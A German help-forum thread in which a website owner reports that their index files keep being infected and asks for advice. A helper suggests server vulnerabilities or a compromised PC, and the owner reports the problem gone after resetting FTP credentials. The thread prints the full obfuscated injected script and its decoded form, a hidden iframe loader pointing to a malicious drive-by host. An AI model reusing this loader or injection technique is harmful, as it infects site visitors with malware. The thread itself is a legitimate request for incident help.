Hallo Community,
derzeit setzt mich ein nervenaufreibendes Problem unter Druck.

Meine gesamten index.html und index.php Dateien auf meinem Webspace sind mit unbekannten Javascripts verseucht.
Dies hat zur Folge, das man aufgefordert wird ein Plugin für den Standard Media Player zu installieren.

Ich habe die Dateien bereits manuell heute morgen wieder repariert, sprich den Code entfernt und neu hochgeladen.
Ein wenig später tritt genau das gleiche Problem auf.
Hier der Schädlingscode vor dem schließenden </body> Tag:

Code: Alles auswählenAufklappen

ATTFilter

<!-- ad --><script>var af="4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,50.5*2,55.5*2,56*2,55.5*2,61*2,52.5*2,58*2,52.5*2,59*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,54.5*2,50.5*2,54*2,54*2,23.5*2,49.5*2,58*2,53*2,55*2,49*2,58*2,52.5*2,23*2,56*2,52*2,56*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,50.5*2,55.5*2,56*2,55.5*2,61*2,52.5*2,58*2,52.5*2,59*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,54.5*2,50.5*2,54*2,54*2,23.5*2,49.5*2,58*2,53*2,55*2,49*2,58*2,52.5*2,23*2,56*2,52*2,56*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2".split(",");qtr=new Date(2010,11,5);var xvj="";var hspd="e"+(parseInt(qtr.getMonth())-1)+"a"+xvj+"l";mdco=(function(){return this;})();biwp=mdco[hspd.replace("10","v")];bqp=window['String'].fromCharCode;var wc='';for(var i=0;i<af.length;i++){wc+=bqp(biwp(af[i]));}
biwp(wc);</script><!-- /ad -->
         

Decodiert:

Code: Alles auswählenAufklappen

ATTFilter

if (document.getElementsByTagName('body')[0]){
   iframer();
  } else {
   var bdy = document.createElement("body");
   try {
    document.appendChild(bdy);
   } catch (e) {
    document.body = bdy;
   }
   if (document.getElementsByTagName('body')[0]){
    iframer();
   } else {
    document.write("<iframe src='hxxp://geopozitiv.com/mell/ctjnbti.php' width='10' height='10' style='visibility: hidden;'></iframe>");
   }
  }
  function iframer(){
   document.getElementsByTagName('body')[0].innerHTML += "<iframe src='hxxp://geopozitiv.com/mell/ctjnbti.php' width='10' height='10' style='visibility: hidden;'></iframe>";
  }
         

Danke für alle Tipps und Hinweise.

mfg,
unwissender4

Editier mal den Post von Dir und entfern die links bitte.

Schick mir doch mal ne PN mit Deiner Webseite.

Zitat:

Zitat von BataAlexander

Editier mal den Post von Dir und entfern die links bitte.

Schick mir doch mal ne PN mit Deiner Webseite.

Ich kann den Beitrag seit der Verschiebung nicht mehr editieren, tut mir Leid.
PN mit Link ist raus, die index Datei wurde aber wieder von mir bereinigt.

Ich habe auch aus Sicherheitsgründen das FTP-Programm gewechselt, sowie die FTP-Accounts gelöscht.

mfg

Auf der Seite selber kann ich erst mal nichts feststellen.
Es kann imho liegen an
- schlecht konfigurierter Web Server, Schwachstellen werden aktiv ausgenutzt.
Mal im Benutzermenü Deines Providers versuchen herauszufinden, auf was der Server läuft, sind da noch andere Oberflächen installiert? Jommala oder Typo Exploids erlauben in einigen Fällen vollen Root Zugriff.
- Jemand hat Zugriff auf Deinen Rechner. In Dem Fall mal das System scannen wie von Larusso und der Load.exe beschrieben und die Ergebnisse posten.

Zitat:

Zitat von BataAlexander

Auf der Seite selber kann ich erst mal nichts feststellen.
Es kann imho liegen an
- schlecht konfigurierter Web Server, Schwachstellen werden aktiv ausgenutzt.
Mal im Benutzermenü Deines Providers versuchen herauszufinden, auf was der Server läuft, sind da noch andere Oberflächen installiert? Jommala oder Typo Exploids erlauben in einigen Fällen vollen Root Zugriff.
- Jemand hat Zugriff auf Deinen Rechner. In Dem Fall mal das System scannen wie von Larusso und der Load.exe beschrieben und die Ergebnisse posten.

Momentan taucht das Problem nicht mehr auf, seitdem ich meine FTP-Kontos gelöscht und mit einem neuen Passwort wieder erstellt habe.
Zudem benutze ich auch keine veralteten CM-Systeme, sondern selbst entwickelte Frontends.

Meine index Dateien habe ich manuell wieder auf Vordermann gebracht, den Hoster bereits informiert.
Normalerweise tritt das Problem sonst eigentlich immer nach 1-2 Stunden wieder auf, scheint also gelöst zu sein.
Ansonsten werde ich mich nochmal zu Wort melden.

Ich bedanke für deine Bemühungen, und wünsche dir noch ein frohes Weihnachtsfest

mfg